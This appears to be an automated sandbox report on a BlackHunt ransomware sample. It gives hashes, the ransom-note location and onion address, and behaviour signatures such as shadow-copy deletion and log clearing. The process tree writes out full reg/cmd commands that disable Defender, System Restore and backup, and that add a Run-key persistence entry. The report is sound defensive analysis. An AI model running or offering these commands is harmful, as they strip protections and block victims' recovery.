Analysis
-
max time kernel
4s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:40
Static task
static1
Behavioral task
behavioral1
Sample
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
Resource
win10v2004-20231222-en
General
-
Target
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
-
Size
707KB
-
MD5
bd832d91e87c94446cac9a4a1faef941
-
SHA1
70350177b274b65b0abfede3b10ebd74dde2fd08
-
SHA256
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5
-
SHA512
656073224d1fe39295d3434a733ee22b84c86f9713f102f66ae4a5148134d73a2128b5bcd39a26dd8424f1d2bfab667d61d2dada41a6158417129a0d30c729e0
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1E8pvnh:6uaTmkZJ+naie5OTamgEoKxLWHNh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3108 fsutil.exe 2808 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 15864 wevtutil.exe 8084 wevtutil.exe 15300 wevtutil.exe 10156 wevtutil.exe 15352 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7000 bcdedit.exe 2840 bcdedit.exe 17092 bcdedit.exe 16780 bcdedit.exe -
Renames multiple (506) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5616 wbadmin.exe 6536 wbadmin.exe -
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\E: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\I: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\G: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\J: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Z: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\M: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Q: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\S: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\U: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\W: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\R: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\O: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\A: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\H: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\K: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\L: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\X: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\T: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Y: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\N: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\V: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\B: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\meta-index 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\freebxml.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\hijrah-config-umalqura.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jsse.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\mesa3d.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\asm.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightRegular.ttf 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_it.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfont.properties.ja 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\orb.idl 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\resources.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzmappings 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\freebxml.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\santuario.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\plugin.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\dotnet\host\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightItalic.ttf 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\sRGB.pf 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8492 8308 WerFault.exe 246 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3284 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3488 vssadmin.exe 5748 vssadmin.exe 6404 vssadmin.exe 8676 vssadmin.exe 6372 vssadmin.exe 6552 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 9988 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9032 PING.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeRestorePrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeBackupPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeTakeOwnershipPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeAuditPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeSecurityPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeIncBasePriorityPrivilege 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3680 wrote to memory of 484 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 218 PID 3680 wrote to memory of 484 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 218 PID 3680 wrote to memory of 2708 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 120 PID 3680 wrote to memory of 2708 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 120 PID 3680 wrote to memory of 4864 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 236 PID 3680 wrote to memory of 4864 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 236 PID 3680 wrote to memory of 3416 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 214 PID 3680 wrote to memory of 3416 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 214 PID 484 wrote to memory of 5084 484 cmd.exe 213 PID 484 wrote to memory of 5084 484 cmd.exe 213 PID 3680 wrote to memory of 3588 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 98 PID 3680 wrote to memory of 3588 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 98 PID 2708 wrote to memory of 3116 2708 cmd.exe 211 PID 2708 wrote to memory of 3116 2708 cmd.exe 211 PID 3680 wrote to memory of 4380 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 210 PID 3680 wrote to memory of 4380 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 210 PID 3680 wrote to memory of 2072 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 209 PID 3680 wrote to memory of 2072 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 209 PID 3680 wrote to memory of 1412 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 206 PID 3680 wrote to memory of 1412 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 206 PID 4864 wrote to memory of 868 4864 Conhost.exe 205 PID 4864 wrote to memory of 868 4864 Conhost.exe 205 PID 3416 wrote to memory of 2472 3416 cmd.exe 203 PID 3416 wrote to memory of 2472 3416 cmd.exe 203 PID 3680 wrote to memory of 2404 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 200 PID 3680 wrote to memory of 2404 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 200 PID 3588 wrote to memory of 520 3588 cmd.exe 201 PID 3588 wrote to memory of 520 3588 cmd.exe 201 PID 3680 wrote to memory of 1620 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 199 PID 3680 wrote to memory of 1620 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 199 PID 3680 wrote to memory of 3696 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 198 PID 3680 wrote to memory of 3696 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 198 PID 3680 wrote to memory of 2200 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 196 PID 3680 wrote to memory of 2200 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 196 PID 3680 wrote to memory of 1388 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 102 PID 3680 wrote to memory of 1388 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 102 PID 4380 wrote to memory of 1544 4380 cmd.exe 194 PID 4380 wrote to memory of 1544 4380 cmd.exe 194 PID 3680 wrote to memory of 3476 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 193 PID 3680 wrote to memory of 3476 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 193 PID 1412 wrote to memory of 2956 1412 cmd.exe 106 PID 1412 wrote to memory of 2956 1412 cmd.exe 106 PID 2072 wrote to memory of 3496 2072 cmd.exe 138 PID 2072 wrote to memory of 3496 2072 cmd.exe 138 PID 3680 wrote to memory of 4008 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 192 PID 3680 wrote to memory of 4008 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 192 PID 2404 wrote to memory of 5020 2404 cmd.exe 191 PID 2404 wrote to memory of 5020 2404 cmd.exe 191 PID 1620 wrote to memory of 3584 1620 cmd.exe 153 PID 1620 wrote to memory of 3584 1620 cmd.exe 153 PID 3680 wrote to memory of 3784 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 190 PID 3680 wrote to memory of 3784 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 190 PID 3696 wrote to memory of 4388 3696 cmd.exe 189 PID 3696 wrote to memory of 4388 3696 cmd.exe 189 PID 3680 wrote to memory of 560 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 188 PID 3680 wrote to memory of 560 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 188 PID 3680 wrote to memory of 4412 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 187 PID 3680 wrote to memory of 4412 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 187 PID 1388 wrote to memory of 2024 1388 cmd.exe 186 PID 1388 wrote to memory of 2024 1388 cmd.exe 186 PID 3680 wrote to memory of 2808 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 267 PID 3680 wrote to memory of 2808 3680 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 267 PID 2200 wrote to memory of 4392 2200 cmd.exe 184 PID 2200 wrote to memory of 4392 2200 cmd.exe 184 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵
